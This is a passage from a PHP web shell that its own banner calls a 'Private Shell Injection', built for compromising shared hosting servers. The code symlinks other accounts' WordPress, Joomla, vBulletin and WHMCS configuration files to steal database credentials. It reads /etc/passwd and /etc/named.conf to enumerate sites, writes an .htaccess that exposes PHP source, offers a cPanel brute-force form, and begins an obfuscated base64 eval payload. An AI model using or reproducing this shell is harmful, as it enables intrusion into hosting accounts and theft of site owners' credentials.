1158 symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1159 symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1160 symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1161 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1162 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1163 symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1164 symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1165 symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1166 symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1167 symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1168 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1169 symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1170 symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1171 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1172 symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1173 symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1174 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1175 symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1176 symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1177 symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1178 symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1179 symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1180 symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1181 symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1182 symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1183 symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1184 symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1185 symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1186 symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1187 symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1188 symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1189 symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1190 symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1191 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1192 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1193 symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1194 symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1195 symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1196 symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1197 symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1198 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1199 symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1200 symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1201 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1202 symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1203 symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1204 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1205 symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1206 symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1207 symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1208 symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1209 symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1210 symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1211 symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1212 symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1213 symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1214 symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1215 symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1216 symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1217 symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1218 symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1219 symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1220 symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1221 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1222 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1223 symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1224 symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1225 symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1226 symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1227 symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1228 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1229 symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1230 symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1231 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1232 symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1233 symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1234 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1235 symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1236 symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1237 symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1238 symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1239 symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1240 symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1241 symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1242 symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1243 symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1244 symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1245 symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1246 symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1247 symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1248 symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1249 symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1250 symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1251 symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1252 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1253 symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1254 symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1255 symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1256 symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1257 symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1258 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1259 symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1260 symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1261 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1262 symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1263 symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1264 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1265 symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1266 symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1267 symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1268 symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1269 symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1270 symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1271 symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1272 symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1273 symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1274 symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1275 symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1276 symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1277 symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1278 symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1279 symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1280 symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1281 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1282 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1283 symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1284 symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1285 symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1286 symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1287 symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1288 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1289 }
1290
1291 $d0mains = @file("/etc/named.conf");
1292
1293 if($d0mains)
1294 {
1295 mkdir($fn);
1296 chdir($fn);
1297
1298 foreach($d0mains as $d0main)
1299 {
1300 if(eregi("zone",$d0main))
1301 {
1302 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1303 flush();
1304
1305 if(strlen(trim($domains[1][0])) > 2)
1306 {
1307 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1308
1309 syml($user['name'],$domains[1][0]);
1310 }
1311 }
1312 }
1313 echo "<center><font color=lime size=3>Done</font></center>";
1314 echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
1315 }
1316 else
1317 {
1318 mkdir($fn);
1319 chdir($fn);
1320 $temp = "";
1321 $val1 = 0;
1322 $val2 = 1000;
1323 for(;$val1 <= $val2;$val1++)
1324 {
1325 $uid = @posix_getpwuid($val1);
1326 if ($uid)
1327 $temp .= join(':',$uid)."\n";
1328 }
1329 echo '<br/>';
1330 $temp = trim($temp);
1331
1332 $file5 = fopen("test.txt","w");
1333 fputs($file5,$temp);
1334 fclose($file5);
1335
1336$htaccess =
1337'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
1338aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
1339biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
1340';
1341$file = fopen(".htaccess","w+");
1342$write = fwrite ($file ,base64_decode($htaccess));
1343
1344 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1345 while(!feof($file))
1346 {
1347 $s = fgets($file);
1348 $matches = array();
1349 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1350 $matches = str_replace("home/","",$matches[1]);
1351 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1352 continue;
1353 syml($matches,$matches);
1354 }
1355 fclose($file);
1356 echo "</table>";
1357 unlink("test.txt");
1358 echo "<center><font color=lime size=3>Done</font></center>";
1359 echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
1360 }
1361echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
1362exit;
1363}
1364?>
1365<form method="POST" target="_blank">
1366 <strong>
1367<input name="page" type="hidden" value="find"><table>
1368 </strong><br>
1369 <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
1370 <tr>
1371 <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
1372 <center><b><font size="5" style="italic" color="white">Cpanel BruteForce</font></b></center></td></tr>
1373 <tr>
1374 <td>
1375 <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
1376 <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
1377 <strong>User :</strong></td>
1378 <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="usernames"><?php system('ls /var/mail');?></textarea></strong></td>
1379 </tr>
1380 <tr>
1381 <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
1382 <strong>Pass :</strong></td>
1383 <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="passwords"></textarea></strong></td>
1384 </tr>
1385 <tr>
1386 <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
1387 <strong>Type :</strong></td>
1388 <td valign="top" bgcolor="#151515" colspan="5">
1389 <span class="style2"><strong>Simple : </strong> </span>
1390 <strong>
1391 <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
1392 <font class="style2"><strong>/etc/passwd : </strong> </font>
1393 <strong>
1394 <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
1395 </strong>
1396 </span>
1397 </td>
1398 </tr>
1399 <tr>
1400 <td valign="top" bgcolor="#151515" style="width: 139px"></td>
1401 <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="start">
1402 </strong>
1403 </td>
1404 <tr>
1405</form>
1406<tr>
1407 <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Config :</strong></td>
1408 </tr>
1409<form method="POST" target="_blank">
1410 <strong>
1411<input name="mendapatkan" type="hidden" value="passwd">
1412 </strong>
1413 <tr>
1414 <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>
1415 <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="foldername" type="text"></strong></td>
1416 </strong>
1417 </td>
1418 </tr>
1419 <tr>
1420 <td valign="top" bgcolor="#151515" style="width: 139px"></td>
1421 <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
1422 </strong>
1423 </td>
1424 <tr>
1425</form>
1426<tr>
1427 <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Wordlist</strong></td>
1428 </tr>
1429<form method="POST" target="_blank">
1430 <strong>
1431<input name="pass" type="hidden" value="password">
1432 </strong>
1433 <tr>
1434 <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>
1435 <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="url" type="text"></strong></td>
1436 </strong>
1437 </td>
1438 </tr>
1439 <tr>
1440 <td valign="top" bgcolor="#151515" style="width: 139px"></td>
1441 <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
1442 </strong>
1443 </td>
1444 <tr>
1445</form>
1446<tr>
1447 <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info
1448 Security</strong></td>
1449 </tr>
1450 <tr>
1451 <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
1452 <td valign="top" bgcolor="#151515" colspan="5">
1453 <strong>
1454<?php
1455$safe_mode = ini_get('safe_mode');
1456if($safe_mode=='1')
1457{
1458echo 'ON';
1459}else{
1460echo 'OFF';
1461}
1462
1463?>
1464 </strong>
1465 </td>
1466 </tr>
1467 <tr>
1468 <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>
1469 <td valign="top" bgcolor="#151515" colspan="5">
1470 <strong>
1471<form method="POST" target="_blank">
1472 <strong>
1473<input name="matikan" type="hidden" value="sekatan">
1474 </strong>
1475
1476<?php
1477if('==($func=@ini_get('disable_functions')))
1478{
1479echo "<font color=white>No Security for Function</font></b>";
1480}else{
1481echo '<script>alert("Please see below and press >Please Click Here First!<");</script>';
1482echo "<font color=red>$func</font></b>";
1483echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>';
1484echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">
1485 </strong>
1486 </td></tr>';
1487}
1488?></strong></td></tr></table></table></table>
1489<?php
1490}
1491/////////////////////////////////
1492 /* OPEN JUMPING */
1493/////////////////////////////////
1494elseif(isset($_GET['do']) && ($_GET['do'] == 'jumping')){
1495 ?>
1496 <style>
1497 #jm{
1498 background:#000000;
1499 margin:8px 2px 4px 2px;
1500}
1501#jm a{
1502 padding:2px 7px;
1503 margin:0;
1504 background: #595959 ;
1505 border-bottom: 3px solid #E74C3D;
1506 text-decoration:none;
1507 letter-spacing:2px;
1508 -moz-border-radius: 3px; -webkit-border-radius: 3px; -khtml-border-radius: 3px; border-radius: 3px;
1509
1510}
1511#jm a:hover{
1512 background: #404040 ;
1513 border-bottom: 3px solid #E74C3D;
1514}
1515 </style>
1516 <center>
1517 <div id="jm">
1518 <table><tr><td><p align="left"> Note :<br>
1519 # Jumping v1 Ucage Version<br># Jumping v2 InDoXploiT Version</p>
1520 </td></tr></table>
1521 <br>
1522 <a href="?<?php echo "y=".$pwd; ?>&id=1">Jumping V1</a> <a href="?<?php echo "y=".$pwd; ?>&id=2">Jumping V2</a>
1523 </div>
1524 </center>
1525 <?php
1526 }
1527/////////////////////////////////
1528 /* JUMPING HIJI */
1529/////////////////////////////////
1530elseif(isset($_GET['id']) && ($_GET['id'] == '1')){ echo '<center>';
1531 ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<br><b><font color="green">Error: safe_mode = on</font></b> <center><center><br><br><div class="info">-== BebyYers Private Shell Injection - BebyYers ==-</div><br>
1532<div class="jaya"><b>
1533<script language="JavaScript"> Year=new Date(); var copyright=Year.getUTCFullYear(); document.write("© Ucage_48 Shell - " + copyright); </script>
1534<b></div></center><br><br>
1535</div> ');
1536 set_time_limit(0);
1537 ###################
1538 @$passwd = fopen('/etc/passwd','r');
1539 if (!$passwd) { die('<br><b><font color="green">Error : coudn`t read /etc/passwd</font></b> <center><center><br><br><div class="info">-== BebyYers Private Shell Injection - BebyYers ==-</div><br>
1540<div class="jaya"><b>
1541<script language="JavaScript"> Year=new Date(); var copyright=Year.getUTCFullYear(); document.write("© Ucage_48 Shell - " + copyright); </script>
1542<b></div></center><br><br>
1543</div> '); }
1544 $pub = array();
1545 $users = array();
1546 $conf = array();
1547 $i = 0;
1548 while(!feof($passwd))
1549 {
1550 $str = fgets($passwd);
1551 if ($i > 35)
1552 {
1553 $pos = strpos($str,':');
1554 $username = substr($str,0,$pos);
1555 $dirz = '/home/'.$username.'/public_html/';
1556 if (($username != '))
1557 {
1558 if (is_readable($dirz))
1559 {
1560 array_push($users,$username);
1561 array_push($pub,$dirz);
1562 }
1563 }
1564 }
1565 $i++;
1566 }
1567
1568 ###################
1569 echo '</center><br>';
1570 echo "[+] Founded <font size=10 color=red> ".sizeof($users)." </font> entrys in /etc/passwd\n"."<br />";
1571 echo "[+] Founded <font color=red size=10> ".sizeof($pub)." </font> readable public_html directories\n"."<br />";
1572 echo "[~] Searching for passwords in config files...\n\n"."<br /><br /><br />";
1573 foreach ($users as $user)
1574 {
1575 $path = "/home/$user/public_html/";
1576 echo " <table><tr><td> ";
1577 echo "<font color=white>[Found] <a href='?y=$path'>$path</a></font><br>";
1578 echo " </td></tr></table> ";
1579 }
1580 echo "\n";
1581
1582 }
1583/////////////////////////////////
1584 /* JUMPING DUA */
1585/////////////////////////////////
1586 elseif(isset($_GET['id']) && ($_GET['id'] == '2')){
1587 /* indoxploit */
1588 $i = 0;
1589 echo "<br><div class='margin: 5px auto;'><table>";
1590 $etc = fopen("/etc/passwd", "r");
1591 while($passwd = fgets($etc)) {
1592 if($passwd == ' || !$etc) {
1593 echo "<font color=red>Can't read /etc/passwd</font>";
1594 } else {
1595 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
1596 foreach($user_jumping[1] as $user_idx_jump) {
1597 $user_jumping_dir = "/home/$user_idx_jump/public_html";
1598 if(is_readable($user_jumping_dir)) {
1599 $i++;
1600 $jrw = "<tr><td>[<font color=lime>R</font>] <a href='?y=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1601 if(is_writable($user_jumping_dir)) {
1602 $jrw = "<tr><td>[<font color=lime>RW</font>] <a href='?y=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1603 }
1604 echo $jrw;
1605 $domain_jump = file_get_contents("/etc/named.conf");
1606 if($domain_jump == ') {
1607 echo " => ( <font color=red>Error</font> ) </td></tr></table> ";
1608 } else {
1609 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
1610 foreach($domains_jump[1] as $dj) {
1611 $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1612 $user_jumping_url = $user_jumping_url['name'];
1613 if($user_jumping_url == $user_idx_jump) {
1614 echo " => ( <u>$dj</u> ) </td></tr></table> ";
1615
1616 break;
1617 }
1618 }
1619 }
1620 }
1621 }
1622 }
1623 }
1624 if($i == 0) {
1625 } else {
1626 echo "Total : ".$i." site in server ".gethostbyname($_SERVER['HTTP_HOST'])."";
1627 }
1628 echo "</div>";
1629 }
1630/////////////////////////////////
1631 /* DATABASE */
1632/////////////////////////////////
1633elseif(isset($_GET['x']) && ($_GET['x'] == 'db')){
1634?>
1635
1636<?php
1637
1638 $script = "PD9waHAgZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZU5yTlBXdFhHN21TbjJmT21mK2c5UGltN2NFWW16eXZqWjJRUUdZNFE0QUw1TjZkeFY1djIyNURMM2EzMDkwT01CbisrOVpEcjM2WVFKTGRjK2NCTGFsVUpaV2tVbFdwSkg3NjBZL2pLQjdHL2lLSzB5QThyNzZvZFg3NjhYWGlwOE81ZHg2TWh4K1hVZW9udzNnWnBzSGNyemF4T0JvTms5U0wweW9tS25Nc0VGM2hYeTltMGNTdnVzS3RpM2t3amlPcVVTTWdncGVBWE9Pc05SQnI2cnM1QUtDSlB3MUNxSCt5UFR3K1BEd0ZMRWxLVFp0NVk4anU5eUhIM1lBZmt5QU9QVUE5SEw3YjI5OGREbXUxQnVRam5ZME5oV1R2WlBpdnZRUEdBZjlWajM0N0doNmVBQUxNcllsWG9pWGFvaWxxRmwxZFpXZnZlUGZ0NmVIeEg4T1QzYVB0NDIzNEZOMnV3QmJrNE44ZXZnZjQ4Y3hMa3FGL0hTUnBVblV4YnlXQlg0L2VRb1h6UEh2UEYyUEpxRW1RREtmTGNBeDhRcWp4OUh6NHlZdXJMdVI3bzVsUFpXa1FoVW0rS2REQnZZTjNoNEM5K3NpUC9mT2c2aXd1RmtFNGpaeTZ4bHJMTm96R0dRZGdPQXZtUWNxais5T1AweWoydmZGRjFZdGo3NmJxRG4vZGhjRndoMGVISjZmUU15OFJGUmlWajBzL1NXdmlzd0d2Nkd5R3VmUnZSTGNISDUrODJkSW4wR0FxcWxUd3VYa3JIZ0ZMaDY3T1orNVFVbFlCSGlSRGJvUkNBdTI3aFhLSlhPSG1YUDVQRWhsZmVESDBqc1p0bVU1Zk1wMEwzNXY0Y2RVWlIySHFoK242NmMzQ2I0dlV2MDQzTHRMNXJDTmt0UzVVV1gvcEVEbmh6eEsvZ0hNVW5EOTdJRTZzY2hmSzg5SGxBekZDamJzUXpqeFkwcTBINGd5U2FQM2x5MmQvWDk5MEpMZHgrZnF6S2JIN1pQZjRuN3ZIWnk0dXA1UGQvWGZ1QUNaVWFYYmJ5ajU1ZTd4M2REbzgySDYvNitKS3IrQ2NBNUV3WHdCU2xoSTA4ZVRZVFNLUVJNeGxiM3k1WE14dmtvOHpWengrTEI1VkV1K1Q3eVhUWU1ZVGFqS0NEb1ZRWlhRUkpXbGR3TWN5OFdQNldNQ3FwQThVRnZBaGU4aGxJTzVvdmFXNHFxQVZOTTJHMDFtd3FISWVsY1orc3B3Qk04WEhxblB5MitHL0JCVWx4QmxzNmlNSlVST0xxcnQxc2Rsekc5VFlJWW5WS3NpbHJRM01KV1RZYUd3S29CdDVDWDFXRFk5K096MDlHdjZHUzJ6UWNJZnZiMDcrc2QvQWJtTlZPWGp1V3psNEtRMmV0MWpNZ3JHSDBtQmpHVjZHMFZWWUNyMFRKSXNvQ1JBT0txVXByTlU1NUhlRWFsRFhiZWpHc1VqSFBreTgxSU9tdWk3a1hGMUFNYzZ1SmZUckNuSzVsMU0vSFYrb0ZTbzVvZGR6a0FDekpUUFBaRTBROUFPR3NHZzBZSm5ENTNLK0lOaXFnYTNwaGMzMHhyTW80YmtDd2paVnN4UEp5VW5UN2JxTWwzanhXUTBTVHdHbUN5TXpUODZ4WTBjem1FbStDTUxGTWhVTTR1ckY5RDBtRnhGSHhxcTlRWFo2UnRNMzM1elRDNTlHUk54RVMzSGxoYW5ZZ1Y3TUltOUNVL1FLWkdvWWhZUUpSaS9iMHN4RWhjWHFqMU9CTlllSXNPcmFkR0dLeU9sclppOWdnSG83eDRkSDRuVDd6ZjZ1MkhzbmR2OWo3K1QwUktUenhkQUx6LzBaMXdLd3Q4ZTcyNmU3RWxBWGk2cVVMR0wvOE9EWE4vdUhiOFRCNGFrNCtMQy9YOU5WOXcrM2Q4VE85dWsyQUwzZDNoZXdZY0VHTGx5bjRVMG1DZXlpRjM2T1NRM0hCYWpUd3dLNWQzdTcrenNuNG5UMytQM2VBYlJuUjd6NUE3WVRMaDErTmhMbWR1aEgwK0hRRmJzbmI3ZVBKSndyOXZjT2RoOVNuZnRReG1mVjcya2N6VTBEVlpjdHBtYkxjQnZqdGZSNjlXSXlZaWE2eXMrWGZSaGZuakJURDM1T1JFNzJaQ2NJQXFJeUFEVVhYbnFCbjFsTzMwdk1YSzlMVVlIMXoxellQZnd3Z1FKMzhFMkNoN0Vwb1poQjVteVB4LzRpWGQvM3cvUDBvaTJjQm1oelVMdGFrU0tDcE1INEloSXl3eElPZ3Y3OTZjZFhQUlFTVzdqUDlmQTNZTWJmY3grRXowV2FMdFpCYXdrK2RaMjMxdDdvcUhIdE9pczJYa1NS